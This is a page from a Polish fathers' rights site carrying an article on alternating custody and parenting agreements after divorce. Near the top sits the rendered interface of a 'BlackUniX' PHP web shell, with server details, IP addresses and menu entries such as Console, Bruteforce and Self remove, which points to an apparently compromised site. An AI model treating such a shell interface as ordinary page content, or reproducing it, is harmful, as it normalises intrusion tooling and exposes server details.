W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:17:31
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

O opiece naprzemiennej słów kilka
14.05.2008.
W krajach zachodnich w latach 70-tych ubiegłego wieku, nastąpiła ewolucja modelu tradycyjnego podziału ról w rodzinie na profil partnerski, czyli rozłożenie odpowiedzialności ekonomicznej i wychowawczej na dzieci na obydwoje rodziców. Pojawiła się konieczność szukania nowych rozwiązań, bardziej dostosowanych do zmieniającej się sytuacji współczesnej rodziny.

Z badań Roberta Bausermana z Departamentu Zdrowia i Higieny Psychicznej w Baltimore wynika, że dzieci, które po rozwodzie rodziców spędzają porównywalną ilość czasu zarówno z matką jak i ojcem są w większości przypadków lepiej społecznie przystosowane niż dzieci pozbawione kontaktu z jednym z rodziców, poza tym ujawniają mniej problemów emocjonalnych, mają wyższe poczucie wartości i tworzą lepsze relacje w rodzinie i w grupie rówieśniczej.

            Rozwiedzieni rodzice, którzy wspólnie sprawowali opiekę, stawali się wobec siebie mniej agresywni, gdyż życie zmuszało ich do kooperacji i współodpowiedzialności za decyzje dotyczące ich dziecka.

            Wybór opieki naprzemiennej jest więc pewną formą ucieczki od przykrej w skutkach zarówno dla rodziców, jak i dla dziecka walki o sprawowanie nad nim bezpośredniej, samodzielnej opieki. Jeśli jest to wola obydwojgu rodziców, to jest to najlepsza decyzja w sytuacji, gdy nie można uniknąć rozwodu.

            Wszystkie powyższe argumenty za opieką naprzemienną, oraz realia współczesnego życia, także w Polsce, sprawiają, że coraz trudniej z nią polemizować.

            Jednak ze względu na fakt, iż w omawianej kwestii nie ma rozwiązań doskonałych, a jedynie wybór mniejszego zła, konieczna jest jej dokładniejsza analiza.

            Przeciwko takim rozwiązaniom przemawia fakt, że brak stałego, ukochanego miejsca zmusza dziecko do ciągłego adoptowania się. Taka niepewność może doprowadzić do poczucia braku stabilizacji, która jest z kolei związana z potrzebą bezpieczeństwa- jedną z najbardziej prestiżowych wartości w rozwoju osobowości.

            Każdemu człowiekowi, także dziecku konieczny jest ten swój ,,własny kawałek podłogi”, a dom rodzinny to nie hotel, gdzie siedzi się ,, na walizkach” u mamy, bo właśnie jutro wyjeżdża się do taty.

Konieczne jest więc wypracowanie możliwie korzystnego dla wszystkich zainteresowanych regulaminu, który czyniłby życie bliskich sobie osób dotkniętych rozwodem, bardziej znośnym.

            Jednym z takich rozwiązań jest coraz bardziej popularna forma ugody. Jest to pisemna umowa między eksmałżonkami, regulująca najważniejsze problemy dotyczące wychowania dziecka. Musi być oparta na dobrej woli obydwu stron, która z kolei jest najlepszym sprawdzianem uczuć do własnego dziecka. Dobrowolnie przyjęte obowiązki z reguły są bardziej trwałe i skuteczne niż arbitralny wyrok sądu.

            Rzadko się zdarza, by sami rodzice byli w stanie przewidzieć wszystkie potencjalnie konfliktogenne sytuacje, które mogą być źródłem problemów. Dlatego taka forma porozumienia jest jak najbardziej zasadna.

            Ugoda taka powinna uwzględniać następujące kwestie:

1. Dwa miejsca zamieszkania dziecka (dwa adresy), numery telefonów stacjonarnych i komórkowych obydwu rodziców.

2. Ściśle określone terminy kontaktów obydwu rodziców. (Im młodsze dziecko, tym krótsze okresy pobytu u drugiego rodzica).

3. Uregulowane w szczegółach kontakty ze szkołą. (spotkania z rodzicami, imprezy szkolne).

4. Prawo dziecka do nieskrępowanego kontaktu z obydwojgiem rodziców. W sytuacjach wyjątkowych: możliwość kontaktu z drugim rodzicem- w każdej chwili.

5. W sytuacjach konfliktowych- prawo odwoływania się każdego z rodziców do strony trzeciej.

6. Dokładną regulację kwestii finansowych. Najlepiej, gdy status materialny obydwu rodziców jest zbliżony. W przeciwnym wypadku należy ustalić pewne minimum dla obydwojgu rodziców obliczone według dochodów rodzica gorzej sytuowanego, a także pozwolić rodzicowi lepiej sytuowanemu na dodatkowe świadczenia.

 

            Rozwodzący się rodzice, muszą być świadomi następujących konsekwencji swoich decyzji:

1. Nie będą mieć swojego dziecka tak często, jak to było dotychczas.

2. Życie na własny rachunek wymaga wyższych wydatków, niż mieszkanie razem.

 

            Poza tym należy pamiętać, że:

1. Wiadomość o rozwodzie należy przekazać dziecku razem, w sposób jak najmniej bolesny.

2. Należy ściśle przestrzegać ustalonych form kontaktów, a sytuacjach nadzwyczajnych, osobiście kontaktować się z dzieckiem i eksmałżonkiem.

3. Nie należy szczędzić dziecku zapewnień o swej miłości do niego.

4. Należy być bardziej wrażliwym na potrzeby dziecka, niż swoje własne.

5. Nie należy dziecku pozwalać na zbyt wiele, tylko dlatego, aby w jego oczach lepiej wypaść, niż drugi rodzic.

6. Nie wolno wyrażać się źle do dziecka o jego drugim rodzicu.

7. Nie wolno wykorzystywać dziecka do porozumiewania się między sobą.

8. W rozsądnych granicach, należy dziecku mówić prawdę oraz szanować jego zdanie.

9. Należy szanować prawo eksmałżonka do własnego dziecka tak, jak sami byśmy tego chcieli.

10. Należy podtrzymywać pozytywne relacje z dalszą rodziną eksmałżonka, która może wiele pomóc w wychowywaniu dziecka.

11. Dla dobra dziecka warto się,,przełamać” i zrezygnować z chęci odwetu oraz mało ważnych własnych aspiracji.

 

            Życie składa się jednak z wielu ważnych i mniej ważnych aspektów, które decydują o jego jakości. Nie sposób je ująć w ramy dokumentu. Jednak pierwszym i najważniejszym punktem ugody winna być miłość do dziecka, zdolna pokonać wszystkie przeszkody.

Opracował:

Sławomir Lasek

 

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
23.07.2018.